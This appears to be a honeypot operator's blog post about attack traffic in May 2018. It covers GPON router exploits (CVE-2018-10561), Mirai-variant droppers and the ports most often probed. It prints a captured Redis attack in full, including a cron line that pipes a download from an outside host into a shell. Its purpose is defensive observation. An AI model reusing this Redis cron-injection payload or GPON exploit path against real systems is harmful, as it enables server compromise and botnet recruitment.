It’s strange how attacks seem to move around on a weekly/monthly basis. Up until recently I saw a number of attacks against GPON, and today I don’t see a single one. There is some probability in this - I occupy only a small amount of IP space, so with a given number of attackers throwing a given number of attacks per second, some portion of the IP space less than 100% will be hit.
This morning on TCP 6379 I received an offer my computer, fortunately, refused. 2a310d0a24370d0a434f4d4d414e440d *1..$7..COMMAND. 0a2a340d0a24360d0a636f6e6669670d .*4..$6..config. 0a24330d0a7365740d0a2431300d0a64 .$3..set..$10..d 6266696c656e616d650d0a24390d0a62 bfilename..$9..b 61636b75702e64620d0a2a310d0a2434 ackup.db..*1..$4 0d0a736176650d0a2a310d0a24380d0a ..save..*1..$8.. 666c757368616c6c0d0a2a330d0a2433 flushall..*3..$3 0d0a7365740d0a24370d0a74726f6a61 ..set..$7..troja 6e310d0a2436340d0a0a2a2f31202a20 n1..$64...*/1 * 2a202a202a206375726c202d6673534c * * * curl -fsSL 20687474703a2f2f6368726f6d652e7a http://chrome.z 6572306461792e72753a353035302f6d er0day.ru:5050/m 727831207c2073680a0d0a rx1 | sh... Forget everything you know! Trojan time. The download link provided a shell script, which used both yum and apt-get to install a variety of dependencies, add an authorized ssh key to root, drop external connections to port 6379 via iptables (Bold move!
Here’s a guy who is pretty bold with his malware: hxxp://188.8.131.52/ <font size='12'> <center> IM HERE TO HACK UR BOTNET </center> </font> <font size='12'> <center> if ur a security researcher, follow my twitter @decayable, ill glady anwser any questions </center> </font> He shows up in my honeypot trying to use the GPON vulnerability to drop hxxp://184.108.40.206/w, which then tries to execute Mirai offshoot Okane on a variety of architectures.
I’ve edited this post over time, primarily trying to determine where the most common attacks are hitting. This analysis will lead to more focused analysis of the spots attackers are targeting. Most popular ports 15 May 18: 69 - tftp 445 - smb 8545 - not in /etc/services - maybe misconfigured ethereum client search 3389 - remote desktop 2323 - telnet alternative maybe 5555 - “personal-agent” - maybe just easy to type 5060 - sip - voip 6379 - maybe redis On 16 May 18, same ports largely, but also:
In Glastopf logs I see POST requests to /GponForm/diag_Form?images/. These exploitation attempts have started in the last couple weeks, and their intensity ebbs and flows. The attacks are related to CVE-2018-10561, a router vulnerability which came out on 3 May, and the attempts I’ve seen in the last couple days seem the most sophisticated. Earlier attacks seemed focused on determining whether the vulnerability was present, and dropping further attack code like the MIRAI binaries.